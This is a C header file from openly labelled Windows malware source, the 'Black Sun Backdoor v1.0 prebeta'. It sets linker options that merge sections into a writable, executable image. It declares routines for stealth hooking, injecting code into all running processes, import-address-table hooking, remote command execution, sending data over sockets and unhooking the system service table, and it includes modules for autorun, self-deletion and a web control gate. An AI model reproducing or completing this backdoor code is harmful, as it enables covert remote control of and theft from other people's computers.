src/headers.h

1. /*
2.  *  ---------------------------------------------------------------------
3.  *         ____  _            _     _____            
4.  *        |  _ \| |          | |   / ____|            
5.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
6.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
7.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
8.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
9.  *               Black Sun Backdoor v1.0 prebeta        
10.  *
11.  *                    (x) Cytech 2007
12.  *
13.  *  ---------------------------------------------------------------------
14.  *  [headers.h]
15.  *     typedefines, libraries, headers, linker options etc...
16.  *  ---------------------------------------------------------------------
17.  */
18.  
19. #pragma comment(lib,"user32.lib")
20. #pragma comment(lib,"kernel32.lib")
21. #pragma comment(lib,"ws2_32.lib")
22. #pragma comment(lib,"wininet.lib")
23. #pragma comment(lib,"urlmon.lib")
24. #pragma comment(lib,"WinMM.lib")
25. #pragma comment(lib,"advapi32.lib")
26. #pragma comment(lib,"imagehlp.lib")
27.  
28. #include <windows.h>
29. #include <wininet.h>
30. #include <ntsecapi.h>
31. #include <tlhelp32.h>
32. #include <imagehlp.h>
33. #include <aclapi.h>
34. #include "ntdll.h"
35.  
36. #pragma optimize("gsy", on)
37.  
38. #pragma comment(linker, "/RELEASE")
39. #pragma comment(linker, "/ENTRY:WinMain")
40. #pragma comment(linker, "/BASE:0x29A00000") // baseaddr: do not edit
41. #pragma comment(linker, "/MERGE:.rdata=.data")
42. #pragma comment(linker, "/MERGE:.text=.data")
43. #pragma comment(linker, "/MERGE:.reloc=.data")
44. #pragma comment(linker, "/SECTION:.text,EWRX")
45. #pragma comment(linker, "/IGNORE:4078")
46. #pragma comment(linker, "/FILEALIGN:0x200")
47. #pragma comment(linker, "/SUBSYSTEM:WINDOWS")
48.  
49.  
50.  
51. static DWORD WINAPI SetUpStealthHooks(HANDLE hmodCaller);
52. static DWORD WINAPI StealthMain(LPVOID lpParam);
53. static BOOL StartProcInject(DWORD dwPid, LPTSTR p_Name);
54. static DWORD WINAPI ClientSend(char *Data, SOCKET zsock);
55. static HANDLE WINAPI StartThread(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID param);
56. static DWORD WINAPI ReplaceIAT(PCSTR pszCModName, PROC pfnCurrent, PROC pfnNew, HMODULE hCModule);
57. static DWORD WINAPI ReplaceIATEntryInAllMods(PCSTR pszCModName, PROC pfnCurrent, PROC pfnNew);
58. static DWORD WINAPI ExecuteCMD(char *command);
59. static DWORD GetPIDbyName(LPTSTR p_Name);
60. static DWORD ProcessInject(HANDLE p_handle, DWORD (WINAPI f_Main)(LPVOID));
61. static DWORD StartProcInject(DWORD dwPid, LPTSTR p_Name, DWORD (WINAPI f_Main)(LPVOID));
62. static DWORD WINAPI InjectAllProcesses(DWORD (WINAPI f_Main)(LPVOID));
63. BOOL ReadSST(PDWORD);
64.  
65. typedef BOOL(WINAPI* INETCHECKPROC) // internet.h -> CheckInternetConnection()
66. (
67.     LPDWORD lpdwFlags,
68.     DWORD dwReserved
69. );
70.  
71.     #pragma comment(lib,"ntdll.lib")
72.  
73.     #include    "conf.h"        // configurations
74.     #include    "strings.h"     // my functions
75.     #include    "internet.h"    // internet functions
76.     #include    "functions.h"   // autorun, selfdelete, execute
77.     #include    "backdoor.h"    // backdoor functions
78.     #include    "webgate.h"     // work with WEB gate
79.     #include    "iathooking.h"  // import adress table hooking
80.     #include    "inject.h"      // process-injection
81.    
82.     #include    "r0.h"          // sst-unhook #1
83.     #include    "sst.h"         // sst-unhook #2
84.